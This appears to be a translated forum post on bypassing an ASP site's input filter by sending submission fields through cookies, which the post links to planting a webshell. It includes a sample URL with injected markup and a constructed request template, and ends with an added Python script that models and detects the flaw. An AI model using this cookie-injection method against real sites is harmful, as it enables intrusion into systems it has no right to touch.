Recently I saw, on the Octal forum, a crack analysis of Bole's ASP receiving program that obtains a webshell through the submitted data. A friend happened to ask me to look at the submission problem in Day Discontinue. The main issue is that some programs have user-defined functions, so the original method cannot bypass them; but looking at it yesterday, it can be done by another route.
First, I won't look at Day Discontinue's other bugs here; let's go straight to the submission process.
The submission process announced online is a link like this:
http://www.xxx.com/post.asp?act=&d00=202&d01=src= http://www.a.com >&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30=day discontinue&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123
The response is as shown in Figure 1, which indicates a normal insertion.
Let's look at the page for viewing the data and part of its source code, as shown in Figure 2.
But some programs have used custom functions to validate and filter the submitted data.
The code I have here is as follows:
I expect many friends have already seen this: just like the site system analyzed earlier, this custom code only filters Request.QueryString and Request.Form; it does not filter data submitted through cookies at all! Now let's look again at how Day Discontinue obtains its values:
strAreaName = Request("d00")  ' there are many of these; only one is shown
....
....
If strAreaName <> "" Then RS("AreaName") = strAreaName  ' likewise, only one shown
....
....
This Day Discontinue code does no filtering of its own; the filtering is added by the custom-function page, which passes the request variables through Function CheckStr(ChkStr). But there is one more submission route: cookies! Below we look at the submission method.
First, capture a packet from a normal submission, then construct the data packet. The packet I constructed is as follows (I have altered the real information here, ^_^):
GET /post.asp?act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: xxx.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO; d01=; d10=
Here we only need to put the data to be submitted via cookie into the Cookie item; everything else can stay unchanged.
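As an added example (not from the post or from the program it describes), this Python script models the behaviour the post relies on: classic ASP's Request(name) consults QueryString, then Form, then Cookies, so a CheckStr that only runs over the first two collections leaves a cookie-supplied value untouched. It parses a constructed request modelled on the one above, places the unfiltered lookup beside a hardened one that names its collection, and flags application parameters that arrive only in the Cookie header; the APP_PARAMS list, the FORBIDDEN set and the check_str body are assumptions standing in for the real CheckStr.

```python
from urllib.parse import parse_qs, urlsplit
# Constructed request modelled on the one in the post; the cookie values are
# harmless placeholders that merely contain characters the filter rejects.
RAW_REQUEST = (
    "GET /post.asp?act=&d00=202&d30=cookie&d32=1&d99=123 HTTP/1.1\r\n"
    "Host: xxx.com\r\n"
    "Cookie: ASPSESSIONIDCATSSDRC=PLACEHOLDER; d01=<b>x</b>; d10=\r\n\r\n"
)
APP_PARAMS = {"d00", "d01", "d02", "d10", "d11", "d30", "d32", "d99"}  # names from the post
FORBIDDEN = "<>'\""  # assumed stand-in for the characters CheckStr rejects

def parse_request(raw):
    """Split a raw request into the collections classic ASP consults."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = dict(h.split(": ", 1) for h in header_lines if ": " in h)
    cookies = dict(p.strip().partition("=")[::2]
                   for p in headers.get("Cookie", "").split(";") if "=" in p)
    query = urlsplit(request_line.split(" ")[1]).query
    return {"QueryString": {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()},
            "Form": {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()},
            "Cookies": cookies}

def check_str(value):
    """Stand-in for the page's CheckStr: drop the rejected characters."""
    return "".join(ch for ch in value if ch not in FORBIDDEN)

def asp_request(colls, name):
    """Emulate Request(name): QueryString, then Form, then Cookies wins."""
    for coll in ("QueryString", "Form", "Cookies"):
        if name in colls[coll]:
            return colls[coll][name]
    return ""

def vulnerable_lookup(colls, name):
    """The post's pattern: CheckStr runs over QueryString and Form only."""
    filtered = {c: {k: check_str(v) for k, v in colls[c].items()}
                for c in ("QueryString", "Form")}
    filtered["Cookies"] = colls["Cookies"]  # never filtered, as in the post
    return asp_request(filtered, name)

def hardened_lookup(colls, name):
    """Fix: read a named collection and filter whatever it returns."""
    return check_str(colls["QueryString"].get(name, colls["Form"].get(name, "")))

def cookie_only_params(colls):
    """Detection: app parameters that arrive solely via the Cookie header."""
    return {p for p in APP_PARAMS if p in colls["Cookies"]
            and p not in colls["QueryString"] and p not in colls["Form"]}
```

Running cookie_only_params over request logs (or as a server-side check before post.asp reads anything) surfaces exactly the submissions this post describes, since d01 and d10 should never legitimately arrive as cookies.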